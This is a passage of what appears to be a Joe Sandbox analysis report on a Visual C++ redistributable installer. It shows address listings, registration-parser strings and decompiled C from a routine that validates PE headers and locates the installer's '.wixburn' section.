                                                                          0x0001fcf0
                                                                          0x0001fcc6
                                                                          0x00000000
                                                                          0x0001fcc6
                                                                          0x0001fc9a
                                                                          0x00000000
                                                                          0x0001fc9a
                                                                          0x0001f9d7
                                                                          0x0001f9e3
                                                                          0x0001f9f4
                                                                          0x0001f9f8
                                                                          0x0001fa04
                                                                          0x0001fa15
                                                                          0x0001fa19
                                                                          0x0001fa29
                                                                          0x0001fa3a
                                                                          0x0001fa3e
                                                                          0x0001fa4e
                                                                          0x0001fa5f
                                                                          0x0001fa63
                                                                          0x0001fa73
                                                                          0x0001fa84
                                                                          0x0001fa88
                                                                          0x0001fa98
                                                                          0x0001faa9
                                                                          0x0001faad
                                                                          0x0001fabd
                                                                          0x0001face
                                                                          0x0001fad2
                                                                          0x0001fae2
                                                                          0x0001faf3
                                                                          0x0001faf7
                                                                          0x0001fb07
                                                                          0x0001fb18
                                                                          0x0001fb1c
                                                                          0x0001fb2c
                                                                          0x0001fb40
                                                                          0x0001fb44
                                                                          0x0001fb54
                                                                          0x0001fb68
                                                                          0x0001fb6c
                                                                          0x0001fb8d
                                                                          0x0001fb91
                                                                          0x0001fc33
                                                                          0x0001fc35
                                                                          0x0001fc3c
                                                                          0x0001fc3c
                                                                          0x0001fc3e
                                                                          0x0001fc40
                                                                          0x0001fc4c
                                                                          0x0001fc60
                                                                          0x0001fc64
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001fc68
                                                                          0x0001fc74
                                                                          0x00000000
                                                                          0x0001fc74
                                                                          0x0001fc6a
                                                                          0x00000000
                                                                          0x0001fc6a
                                                                          0x0001fc42
                                                                          0x00000000
                                                                          0x0001fc42
                                                                          0x0001fbad
                                                                          0x0001fbb1
                                                                          0x0001fbb4
                                                                          0x0001fbd3
                                                                          0x0001fbf6
                                                                          0x0001fc06
                                                                          0x0001fc16
                                                                          0x0001fc1b
                                                                          0x0001fc1e
                                                                          0x0001fc23
                                                                          0x0001fc23
                                                                          0x0001fc24
                                                                          0x00000000
                                                                          0x0001fc29
                                                                          0x0001fbf8
                                                                          0x0001fbff
                                                                          0x0001fbff
                                                                          0x00000000
                                                                          0x0001fbff
                                                                          0x0001fbd5
                                                                          0x00000000
                                                                          0x0001fbd5
                                                                          0x0001fbb6
                                                                          0x00000000
                                                                          0x0001fb72
                                                                          0x0001fb72
                                                                          0x00000000
                                                                          0x0001fb72
                                                                          0x0001fb4a
                                                                          0x0001fb4a
                                                                          0x00000000
                                                                          0x0001fb4a
                                                                          0x0001fb22
                                                                          0x0001fb22
                                                                          0x00000000
                                                                          0x0001fb22
                                                                          0x0001fafd
                                                                          0x0001fafd
                                                                          0x00000000
                                                                          0x0001fafd
                                                                          0x0001fad8
                                                                          0x0001fad8
                                                                          0x00000000
                                                                          0x0001fad8
                                                                          0x0001fab3
                                                                          0x0001fab3
                                                                          0x00000000
                                                                          0x0001fab3
                                                                          0x0001fa8e
                                                                          0x0001fa8e
                                                                          0x00000000
                                                                          0x0001fa8e
                                                                          0x0001fa69
                                                                          0x0001fa69
                                                                          0x00000000
                                                                          0x0001fa69
                                                                          0x0001fa44
                                                                          0x0001fa44
                                                                          0x00000000
                                                                          0x0001fa44
                                                                          0x0001fa1f
                                                                          0x0001fa1f
                                                                          0x00000000
                                                                          0x0001fa1f
                                                                          0x0001fa19
                                                                          0x0001f9fa
                                                                          0x00000000
                                                                          0x0001f9fa
                                                                          0x0001f9d9
                                                                          0x00000000
                                                                          0x0001f9d9
                                                                          0x0001f9af
                                                                          0x00000000
                                                                          0x0001f9af
                                                                          0x0001f991
                                                                          0x00000000
                                                                          0x0001f991
                                                                          0x0001f970
                                                                          0x00000000
                                                                          0x0001f970
                                                                          0x0001f94c
                                                                          0x0001f94f
                                                                          0x00000000
                                                                          0x0001f94f
                                                                          0x0001f92e
                                                                          0x00000000
                                                                          0x0001f92e
                                                                          0x0001f90d
                                                                          0x00000000
                                                                          0x0001f90d
                                                                          0x0001f8f4
                                                                          0x00000000
                                                                          0x0001f8f4
                                                                          0x0001f8d3
                                                                          0x00000000
                                                                          0x0001f8d3
                                                                          0x0001f8a6
                                                                          0x0001f8ab
                                                                          0x0001f8ac
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                          • API String ID: 0-2956246334
                                                                          • Opcode ID: 740b7063b8bc62459de127fa69f455638e7cf86b0abf9ca5400e3bc0c3fd2ffb
                                                                          • Instruction ID: 28652cd8e0ea88d0bf34c7eef1507b6adc299f3206120d8914107bdf4e2bbfa9
                                                                          • Opcode Fuzzy Hash: 740b7063b8bc62459de127fa69f455638e7cf86b0abf9ca5400e3bc0c3fd2ffb
                                                                          • Instruction Fuzzy Hash: 19E1D832E84777BBCB21A6A0CC42EFE7AA6AB00754F150275FE11FB251D7A15E8097C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001B389 Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 565fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 392 1b389-1b3fd call 3f670 * 2 397 1b435-1b450 SetFilePointerEx 392->397 398 1b3ff-1b42a call 137d3 392->398 399 1b452-1b482 call 137d3 397->399 400 1b484-1b49e ReadFile 397->400 415 1b42f-1b430 398->415 399->415 402 1b4a0-1b4d0 call 137d3 400->402 403 1b4d5-1b4dc 400->403 402->415 405 1bad3-1bae7 call 137d3 403->405 406 1b4e2-1b4eb 403->406 419 1baec 405->419 406->405 409 1b4f1-1b501 SetFilePointerEx 406->409 416 1b503-1b52e call 137d3 409->416 417 1b538-1b550 ReadFile 409->417 421 1baed-1baf3 call 5012f 415->421 416->417 422 1b552-1b57d call 137d3 417->422 423 1b587-1b58e 417->423 419->421 433 1baf4-1bb06 call 3de36 421->433 422->423 425 1b594-1b59e 423->425 426 1bab8-1bad1 call 137d3 423->426 425->426 429 1b5a4-1b5c7 SetFilePointerEx 425->429 426->419 434 1b5c9-1b5f4 call 137d3 429->434 435 1b5fe-1b616 ReadFile 429->435 434->435 441 1b618-1b643 call 137d3 435->441 442 1b64d-1b665 ReadFile 435->442 441->442 443 1b667-1b692 call 137d3 442->443 444 1b69c-1b6b7 SetFilePointerEx 442->444 443->444 448 1b6f1-1b710 ReadFile 444->448 449 1b6b9-1b6e7 call 137d3 444->449 451 1b716-1b718 448->451 452 1ba79-1baad call 137d3 448->452 449->448 457 1b719-1b720 451->457 478 1baae-1bab6 call 5012f 452->478 460 1ba54-1ba71 call 137d3 457->460 461 1b726-1b732 457->461 475 1ba76-1ba77 460->475 466 1b734-1b73b 461->466 467 1b73d-1b746 461->467 466->467 471 1b780-1b787 466->471 472 1ba17-1ba2e call 137d3 467->472 473 1b74c-1b772 ReadFile 467->473 479 1b7b0-1b7c7 call 138d4 471->479 480 1b789-1b7ab call 137d3 471->480 485 1ba33-1ba39 call 5012f 472->485 473->452 477 1b778-1b77e 473->477 475->478 477->457 478->433 490 1b7c9-1b7e6 call 137d3 479->490 491 1b7eb-1b800 SetFilePointerEx 479->491 480->475 497 1ba3f-1ba40 485->497 490->421 493 1b840-1b865 ReadFile 491->493 494 1b802-1b830 call 137d3 491->494 498 1b867-1b89a call 137d3 493->498 499 1b89c-1b8a8 493->499 518 1b835-1b83b call 5012f 494->518 503 1ba41-1ba43 497->503 498->518 500 1b8cb-1b8cf 499->500 501 1b8aa-1b8c6 call 137d3 499->501 505 1b8d1-1b905 call 137d3 call 5012f 500->505 506 1b90a-1b91d call 548cb 500->506 501->485 503->433 508 1ba49-1ba4f call 13999 503->508 505->503 523 1b929-1b933 506->523 524 1b91f-1b924 506->524 508->433 518->497 525 1b935-1b93b 523->525 526 1b93d-1b945 523->526 524->518 529 1b956-1b9b6 call 138d4 525->529 530 1b951-1b954 526->530 531 1b947-1b94f 526->531 534 1b9b8-1b9d4 call 137d3 529->534 535 1b9da-1b9fb call 3f0f0 call 1b106 529->535 530->529 531->529 534->535 535->503 542 1b9fd-1ba0d call 137d3 535->542 542->472
                                                                          C-Code - Quality: 67%
                                                                          			E0001B389(union _LARGE_INTEGER* __edx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				union _LARGE_INTEGER _v12;
				void _v72;
				signed short _v300;
				signed int _v314;
				void _v320;
				union _LARGE_INTEGER _v340;
				long _v344;
				void _v360;
				long _v364;
				union _LARGE_INTEGER* _v368;
				intOrPtr _v372;
				void _v376;
				void _v380;
				struct _OVERLAPPED* _v384;
				intOrPtr _v388;
				union _LARGE_INTEGER _v392;
				intOrPtr _v396;
				char _v400;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t98;
				intOrPtr _t106;
				int _t108;
				int _t117;
				int _t120;
				union _LARGE_INTEGER _t123;
				int _t124;
				int _t133;
				signed short _t137;
				intOrPtr* _t142;
				int _t151;
				intOrPtr _t160;
				signed short _t188;
				signed short _t191;
				signed short _t196;
				signed short _t199;
				signed short _t202;
				signed short _t205;
				signed short _t208;
				signed short _t211;
				signed short _t214;
				signed short _t217;
				signed short _t220;
				signed int _t224;
				void* _t226;
				intOrPtr _t237;
				void _t241;
				intOrPtr _t242;
				union _LARGE_INTEGER* _t243;
				void* _t244;
				void* _t247;
				void* _t248;
				void* _t252;
				signed int _t290;

				_t243 = __edx;
				_t98 =  *0x7a008; // 0xfbf51acb
				_v8 = _t98 ^ _t290;
				_t223 = _a4;
				asm("xorps xmm0, xmm0");
				_v364 = 0;
				asm("movlpd [ebp-0x18c], xmm0");
				E0003F670(_t244,  &_v72, 0, 0x40);
				E0003F670(_t244,  &_v320, 0, 0xf8);
				_v376 = 0;
				_v380 = 0;
				_v368 = 0;
				_t224 = 0xa;
				memset( &_v360, 0, _t224 << 2);
				_t226 = _a8;
				 *_t223 = _t226;
				if(_t226 != 0xffffffff) {
					_t106 = _a12;
					_t247 = SetFilePointerEx;
					_push(0);
					_t107 =  ==  ? _t226 : _t106;
					 *((intOrPtr*)(_t223 + 4)) =  ==  ? _t226 : _t106;
					_t108 = SetFilePointerEx(_t226, 0, 0, 0); // executed
					if(_t108 != 0) {
						_t111 = ReadFile( *_t223,  &_v72, 0x40,  &_v364, 0); // executed
						if(_t111 != 0) {
							if(_v364 < 0x40) {
								L66:
								_t247 = 0x8007000d;
								_t252 = 0x8007000d;
								E000137D3(_t111, "section.cpp", 0x4e, 0x8007000d);
								_push("Failed to find valid DOS image header in buffer.");
								L67:
								_push(_t247);
								goto L68;
							}
							_t111 = 0x5a4d;
							if(0x5a4d != _v72) {
								goto L66;
							}
							_push(0);
							asm("cdq");
							_t117 = SetFilePointerEx( *_t223, _v12.LowPart, _t243, 0); // executed
							if(_t117 != 0) {
								_t120 = ReadFile( *_t223,  &_v320, 0x18,  &_v364, 0); // executed
								if(_t120 != 0) {
									if(_v364 < 0x18 || _v320 != 0x4550) {
										_t247 = 0x8007000d;
										_t252 = 0x8007000d;
										E000137D3(_t120, "section.cpp", 0x64, 0x8007000d);
										_push("Failed to find valid NT image header in buffer.");
										goto L67;
									} else {
										_t24 = _v12.LowPart + 0x58; // 0x58
										_t123 = _v12.LowPart + 0x98;
										_v388 = _t24;
										_push(0);
										_v392.LowPart = _t123;
										_t124 = SetFilePointerEx( *_t223, _t123, 0, 0); // executed
										if(_t124 != 0) {
											if(ReadFile( *_t223,  &_v376, 4,  &_v364, 0) != 0) {
												if(ReadFile( *_t223,  &_v380, 4,  &_v364, 0) != 0) {
													_push(0);
													_t133 = SetFilePointerEx( *_t223, _v12 + (_v300 & 0x0000ffff) + 0x18, 0, 0); // executed
													if(_t133 != 0) {
														_t247 = 0;
														_v384 = 0;
														if(ReadFile( *_t223,  &_v360, 0x28,  &_v364, 0) == 0) {
															L63:
															_t137 = GetLastError();
															_t255 =  <=  ? _t137 : _t137 & 0x0000ffff | 0x80070000;
															_t252 =  >=  ? 0x80004005 :  <=  ? _t137 : _t137 & 0x0000ffff | 0x80070000;
															E000137D3(0x80004005, "section.cpp", 0x8d, _t252);
															_push(_t247);
															_push("Failed to read image section header, index: %u");
															_push(_t252);
															L64:
															E0005012F();
															goto L69;
														}
														_t237 = 1;
														while(_v364 >= 0x28) {
															_t142 =  &_v360;
															if( *_t142 != 0x7869772e ||  *((intOrPtr*)(_t142 + 4)) != 0x6e727562) {
																_t143 = _v314 & 0x0000ffff;
																if(_t237 >= (_v314 & 0x0000ffff)) {
																	_t248 = 0x8007000d;
																	_t252 = 0x8007000d;
																	E000137D3(_t143, "section.cpp", 0xa0, 0x8007000d);
																	_push("Failed to find Burn section.");
																	goto L57;
																}
																_t247 = _t247 + 1;
																_v384 = _t247;
																_v372 = _t237 + 1;
																if(ReadFile( *_t223,  &_v360, 0x28,  &_v364, 0) == 0) {
																	goto L63;
																}
																_t237 = _v372;
																continue;
															} else {
																if(_v344 >= 0x34) {
																	_t247 = E000138D4(_v344, 1);
																	_v368 = _t247;
																	if(_t247 != 0) {
																		_push(0);
																		_t151 = SetFilePointerEx( *_t223, _v340.LowPart, 0, 0); // executed
																		if(_t151 != 0) {
																			_v372 = _v340 + 0x1c;
																			if(ReadFile( *_t223, _t247, _v344,  &_v364, 0) != 0) {
																				_t156 = _v344;
																				if(_v344 <= _v364) {
																					if( *((intOrPtr*)(_t247 + 4)) == 2) {
																						if(E000548CB(_t237,  *((intOrPtr*)(_t223 + 4)),  &_v400) >= 0) {
																							_t243 =  *(_t247 + 0x18);
																							 *(_t223 + 8) = _t243;
																							if( *((intOrPtr*)(_t247 + 0x20)) == 0) {
																								_t241 = _v376;
																								if(_t241 == 0) {
																									_t160 =  *((intOrPtr*)(_t247 + 0x30)) + _t243;
																								} else {
																									_t160 = _v380 + _t241;
																								}
																							} else {
																								_t160 =  *((intOrPtr*)(_t247 + 0x24)) +  *((intOrPtr*)(_t247 + 0x20));
																							}
																							 *((intOrPtr*)(_t223 + 0xc)) = _t160;
																							 *((intOrPtr*)(_t223 + 0x10)) = _v400;
																							 *((intOrPtr*)(_t223 + 0x14)) = _v396;
																							 *((intOrPtr*)(_t223 + 0x18)) = _v388;
																							 *(_t223 + 0x1c) = _v392;
																							 *((intOrPtr*)(_t223 + 0x20)) = _v372;
																							 *((intOrPtr*)(_t223 + 0x24)) =  *((intOrPtr*)(_t247 + 0x1c));
																							 *((intOrPtr*)(_t223 + 0x28)) =  *((intOrPtr*)(_t247 + 0x20));
																							 *((intOrPtr*)(_t223 + 0x2c)) =  *((intOrPtr*)(_t247 + 0x24));
																							 *((intOrPtr*)(_t223 + 0x30)) =  *((intOrPtr*)(_t247 + 0x28));
																							 *(_t223 + 0x34) =  *(_t247 + 0x2c);
																							_t242 = E000138D4( *(_t247 + 0x2c) << 2, 1);
																							 *((intOrPtr*)(_t223 + 0x38)) = _t242;
																							if(_t242 != 0) {
																								_t93 = _t247 + 0x30; // 0x30
																								E0003F0F0(_t242, _t93,  *(_t223 + 0x34) << 2);
																								_t94 = _t247 + 8; // 0x8
																								_t252 = E0001B106(_t94);
																								if(_t252 >= 0) {
																									goto L59;
																								}
																								E000137D3(_t178, "section.cpp", 0xf5, _t252);
																								_push("PE Header from file didn\'t match PE Header in memory.");
																								L37:
																								_push(_t252);
																								goto L38;
																							} else {
																								_t223 = 0x8007000e;
																								_t252 = 0x8007000e;
																								E000137D3(_t172, "section.cpp", 0xef, 0x8007000e);
																								_push("Failed to allocate memory for container sizes.");
																								_push(0x8007000e);
																								L38:
																								E0005012F();
																								L58:
																								L59:
																								if(_t247 != 0) {
																									E00013999(_t247);
																								}
																								goto L69;
																							}
																						}
																						_push("Failed to get total size of bundle.");
																						goto L37;
																					}
																					_t252 = 0x8007000d;
																					E000137D3(_t156, "section.cpp", 0xcc, 0x8007000d);
																					E0005012F(0x8007000d, "Failed to read section info, unsupported version: %08x", _v368->LowPart.HighPart);
																					_t247 = _v368;
																					goto L59;
																				}
																				_t248 = 0x8007000d;
																				_t252 = 0x8007000d;
																				E000137D3(_t156, "section.cpp", 0xc5, 0x8007000d);
																				_push("Failed to read complete section info.");
																				L57:
																				_push(_t248);
																				E0005012F();
																				_t247 = _v368;
																				goto L58;
																			}
																			_t188 = GetLastError();
																			_t259 =  <=  ? _t188 : _t188 & 0x0000ffff | 0x80070000;
																			_t252 =  >=  ? 0x80004005 :  <=  ? _t188 : _t188 & 0x0000ffff | 0x80070000;
																			E000137D3(0x80004005, "section.cpp", 0xc0, _t252);
																			_push("Failed to read section info.");
																			goto L37;
																		}
																		_t191 = GetLastError();
																		_t262 =  <=  ? _t191 : _t191 & 0x0000ffff | 0x80070000;
																		_t252 =  >=  ? 0x80004005 :  <=  ? _t191 : _t191 & 0x0000ffff | 0x80070000;
																		E000137D3(0x80004005, "section.cpp", 0xb7, _t252);
																		_push("Failed to seek to section info.");
																		goto L37;
																	}
																	_t223 = 0x8007000e;
																	_t252 = 0x8007000e;
																	E000137D3(_t149, "section.cpp", 0xb1, 0x8007000e);
																	_push("Failed to allocate buffer for section info.");
																	_push(0x8007000e);
																	goto L68;
																}
																_t247 = 0x8007000d;
																_t252 = 0x8007000d;
																E000137D3(_t142, "section.cpp", 0xac, 0x8007000d);
																_push(_v344);
																_push("Failed to read section info, data to short: %u");
																L62:
																_push(_t247);
																goto L64;
															}
														}
														_t247 = 0x8007000d;
														_t252 = 0x8007000d;
														E000137D3(_t136, "section.cpp", 0x92, 0x8007000d);
														_push(_v384);
														_push("Failed to read complete image section header, index: %u");
														goto L62;
													}
													_t196 = GetLastError();
													_t265 =  <=  ? _t196 : _t196 & 0x0000ffff | 0x80070000;
													_t252 =  >=  ? 0x80004005 :  <=  ? _t196 : _t196 & 0x0000ffff | 0x80070000;
													E000137D3(0x80004005, "section.cpp", 0x84, _t252);
													_push("Failed to seek past optional headers.");
													goto L2;
												}
												_t199 = GetLastError();
												_t268 =  <=  ? _t199 : _t199 & 0x0000ffff | 0x80070000;
												_t252 =  >=  ? 0x80004005 :  <=  ? _t199 : _t199 & 0x0000ffff | 0x80070000;
												E000137D3(0x80004005, "section.cpp", 0x79, _t252);
												_push("Failed to read signature size.");
												goto L2;
											}
											_t202 = GetLastError();
											_t271 =  <=  ? _t202 : _t202 & 0x0000ffff | 0x80070000;
											_t252 =  >=  ? 0x80004005 :  <=  ? _t202 : _t202 & 0x0000ffff | 0x80070000;
											E000137D3(0x80004005, "section.cpp", 0x74, _t252);
											_push("Failed to read signature offset.");
											goto L2;
										}
										_t205 = GetLastError();
										_t274 =  <=  ? _t205 : _t205 & 0x0000ffff | 0x80070000;
										_t252 =  >=  ? 0x80004005 :  <=  ? _t205 : _t205 & 0x0000ffff | 0x80070000;
										E000137D3(0x80004005, "section.cpp", 0x6f, _t252);
										_push("Failed to seek to section info.");
										goto L2;
									}
								}
								_t208 = GetLastError();
								_t277 =  <=  ? _t208 : _t208 & 0x0000ffff | 0x80070000;
								_t252 =  >=  ? 0x80004005 :  <=  ? _t208 : _t208 & 0x0000ffff | 0x80070000;
								E000137D3(0x80004005, "section.cpp", 0x5f, _t252);
								_push("Failed to read NT header.");
								goto L2;
							}
							_t211 = GetLastError();
							_t280 =  <=  ? _t211 : _t211 & 0x0000ffff | 0x80070000;
							_t252 =  >=  ? 0x80004005 :  <=  ? _t211 : _t211 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "section.cpp", 0x59, _t252);
							_push("Failed to seek to NT header.");
							goto L2;
						}
						_t214 = GetLastError();
						_t283 =  <=  ? _t214 : _t214 & 0x0000ffff | 0x80070000;
						_t252 =  >=  ? 0x80004005 :  <=  ? _t214 : _t214 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "section.cpp", 0x49, _t252);
						_push("Failed to read DOS header.");
						goto L2;
					}
					_t217 = GetLastError();
					_t286 =  <=  ? _t217 : _t217 & 0x0000ffff | 0x80070000;
					_t252 =  >=  ? 0x80004005 :  <=  ? _t217 : _t217 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "section.cpp", 0x43, _t252);
					_push("Failed to seek to start of file.");
					goto L2;
				} else {
					_t220 = GetLastError();
					_t289 =  <=  ? _t220 : _t220 & 0x0000ffff | 0x80070000;
					_t252 =  >=  ? 0x80004005 :  <=  ? _t220 : _t220 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "section.cpp", 0x3a, _t252);
					_push("Failed to open handle to engine process path.");
					L2:
					_push(_t252);
					L68:
					E0005012F();
					L69:
					return E0003DE36(_t223, _v8 ^ _t290, _t243, _t247, _t252);
				}
			}




























































                                                                          0x0001b389
                                                                          0x0001b392
                                                                          0x0001b399
                                                                          0x0001b39d
                                                                          0x0001b3a7
                                                                          0x0001b3ae
                                                                          0x0001b3b4
                                                                          0x0001b3bc
                                                                          0x0001b3ce
                                                                          0x0001b3d6
                                                                          0x0001b3de
                                                                          0x0001b3ea
                                                                          0x0001b3f2
                                                                          0x0001b3f3
                                                                          0x0001b3f5
                                                                          0x0001b3f8
                                                                          0x0001b3fd
                                                                          0x0001b435
                                                                          0x0001b43b
                                                                          0x0001b441
                                                                          0x0001b445
                                                                          0x0001b449
                                                                          0x0001b44c
                                                                          0x0001b450
                                                                          0x0001b49a
                                                                          0x0001b49e
                                                                          0x0001b4dc
                                                                          0x0001bad3
                                                                          0x0001bad3
                                                                          0x0001bae0
                                                                          0x0001bae2
                                                                          0x0001bae7
                                                                          0x0001baec
                                                                          0x0001baec
                                                                          0x00000000
                                                                          0x0001baec
                                                                          0x0001b4e2
                                                                          0x0001b4eb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001b4f4
                                                                          0x0001b4f8
                                                                          0x0001b4fd
                                                                          0x0001b501
                                                                          0x0001b54c
                                                                          0x0001b550
                                                                          0x0001b58e
                                                                          0x0001bab8
                                                                          0x0001bac5
                                                                          0x0001bac7
                                                                          0x0001bacc
                                                                          0x00000000
                                                                          0x0001b5a4
                                                                          0x0001b5a7
                                                                          0x0001b5aa
                                                                          0x0001b5af
                                                                          0x0001b5b7
                                                                          0x0001b5bd
                                                                          0x0001b5c3
                                                                          0x0001b5c7
                                                                          0x0001b616
                                                                          0x0001b665
                                                                          0x0001b6ad
                                                                          0x0001b6b3
                                                                          0x0001b6b7
                                                                          0x0001b6f1
                                                                          0x0001b703
                                                                          0x0001b710
                                                                          0x0001ba79
                                                                          0x0001ba79
                                                                          0x0001ba8a
                                                                          0x0001ba94
                                                                          0x0001baa2
                                                                          0x0001baa7
                                                                          0x0001baa8
                                                                          0x0001baad
                                                                          0x0001baae
                                                                          0x0001baae
                                                                          0x00000000
                                                                          0x0001bab3
                                                                          0x0001b718
                                                                          0x0001b719
                                                                          0x0001b726
                                                                          0x0001b732
                                                                          0x0001b73d
                                                                          0x0001b746
                                                                          0x0001ba17
                                                                          0x0001ba27
                                                                          0x0001ba29
                                                                          0x0001ba2e
                                                                          0x00000000
                                                                          0x0001ba2e
                                                                          0x0001b754
                                                                          0x0001b75e
                                                                          0x0001b768
                                                                          0x0001b772
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001b778
                                                                          0x00000000
                                                                          0x0001b780
                                                                          0x0001b787
                                                                          0x0001b7bd
                                                                          0x0001b7bf
                                                                          0x0001b7c7
                                                                          0x0001b7ed
                                                                          0x0001b7f8
                                                                          0x0001b800
                                                                          0x0001b84b
                                                                          0x0001b865
                                                                          0x0001b89c
                                                                          0x0001b8a8
                                                                          0x0001b8cf
                                                                          0x0001b91d
                                                                          0x0001b929
                                                                          0x0001b92c
                                                                          0x0001b933
                                                                          0x0001b93d
                                                                          0x0001b945
                                                                          0x0001b954
                                                                          0x0001b947
                                                                          0x0001b94d
                                                                          0x0001b94d
                                                                          0x0001b935
                                                                          0x0001b938
                                                                          0x0001b938
                                                                          0x0001b956
                                                                          0x0001b95f
                                                                          0x0001b968
                                                                          0x0001b971
                                                                          0x0001b97a
                                                                          0x0001b983
                                                                          0x0001b989
                                                                          0x0001b98f
                                                                          0x0001b995
                                                                          0x0001b99b
                                                                          0x0001b9a1
                                                                          0x0001b9af
                                                                          0x0001b9b1
                                                                          0x0001b9b6
                                                                          0x0001b9e1
                                                                          0x0001b9e6
                                                                          0x0001b9ee
                                                                          0x0001b9f7
                                                                          0x0001b9fb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ba08
                                                                          0x0001ba0d
                                                                          0x0001b835
                                                                          0x0001b835
                                                                          0x00000000
                                                                          0x0001b9b8
                                                                          0x0001b9b8
                                                                          0x0001b9c8
                                                                          0x0001b9ca
                                                                          0x0001b9cf
                                                                          0x0001b9d4
                                                                          0x0001b836
                                                                          0x0001b836
                                                                          0x0001ba3f
                                                                          0x0001ba41
                                                                          0x0001ba43
                                                                          0x0001ba4a
                                                                          0x0001ba4a
                                                                          0x00000000
                                                                          0x0001ba43
                                                                          0x0001b9b6
                                                                          0x0001b91f
                                                                          0x00000000
                                                                          0x0001b91f
                                                                          0x0001b8e1
                                                                          0x0001b8e3
                                                                          0x0001b8f7
                                                                          0x0001b8fc
                                                                          0x00000000
                                                                          0x0001b902
                                                                          0x0001b8aa
                                                                          0x0001b8ba
                                                                          0x0001b8bc
                                                                          0x0001b8c1
                                                                          0x0001ba33
                                                                          0x0001ba33
                                                                          0x0001ba34
                                                                          0x0001ba39
                                                                          0x00000000
                                                                          0x0001ba39
                                                                          0x0001b867
                                                                          0x0001b878
                                                                          0x0001b882
                                                                          0x0001b890
                                                                          0x0001b895
                                                                          0x00000000
                                                                          0x0001b895
                                                                          0x0001b802
                                                                          0x0001b813
                                                                          0x0001b81d
                                                                          0x0001b82b
                                                                          0x0001b830
                                                                          0x00000000
                                                                          0x0001b830
                                                                          0x0001b7c9
                                                                          0x0001b7d9
                                                                          0x0001b7db
                                                                          0x0001b7e0
                                                                          0x0001b7e5
                                                                          0x00000000
                                                                          0x0001b7e5
                                                                          0x0001b789
                                                                          0x0001b799
                                                                          0x0001b79b
                                                                          0x0001b7a0
                                                                          0x0001b7a6
                                                                          0x0001ba76
                                                                          0x0001ba76
                                                                          0x00000000
                                                                          0x0001ba76
                                                                          0x0001b732
                                                                          0x0001ba54
                                                                          0x0001ba64
                                                                          0x0001ba66
                                                                          0x0001ba6b
                                                                          0x0001ba71
                                                                          0x00000000
                                                                          0x0001ba71
                                                                          0x0001b6b9
                                                                          0x0001b6ca
                                                                          0x0001b6d4
                                                                          0x0001b6e2
                                                                          0x0001b6e7
                                                                          0x00000000
                                                                          0x0001b6e7
                                                                          0x0001b667
                                                                          0x0001b678
                                                                          0x0001b682
                                                                          0x0001b68d
                                                                          0x0001b692
                                                                          0x00000000
                                                                          0x0001b692
                                                                          0x0001b618
                                                                          0x0001b629
                                                                          0x0001b633
                                                                          0x0001b63e
                                                                          0x0001b643
                                                                          0x00000000
                                                                          0x0001b643
                                                                          0x0001b5c9
                                                                          0x0001b5da
                                                                          0x0001b5e4
                                                                          0x0001b5ef
                                                                          0x0001b5f4
                                                                          0x00000000
                                                                          0x0001b5f4
                                                                          0x0001b58e
                                                                          0x0001b552
                                                                          0x0001b563
                                                                          0x0001b56d
                                                                          0x0001b578
                                                                          0x0001b57d
                                                                          0x00000000
                                                                          0x0001b57d
                                                                          0x0001b503
                                                                          0x0001b514
                                                                          0x0001b51e
                                                                          0x0001b529
                                                                          0x0001b52e
                                                                          0x00000000
                                                                          0x0001b52e
                                                                          0x0001b4a0
                                                                          0x0001b4b1
                                                                          0x0001b4bb
                                                                          0x0001b4c6
                                                                          0x0001b4cb
                                                                          0x00000000
                                                                          0x0001b4cb
                                                                          0x0001b452
                                                                          0x0001b463
                                                                          0x0001b46d
                                                                          0x0001b478
                                                                          0x0001b47d
                                                                          0x00000000
                                                                          0x0001b3ff
                                                                          0x0001b3ff
                                                                          0x0001b410
                                                                          0x0001b41a
                                                                          0x0001b425
                                                                          0x0001b42a
                                                                          0x0001b42f
                                                                          0x0001b42f
                                                                          0x0001baed
                                                                          0x0001baed
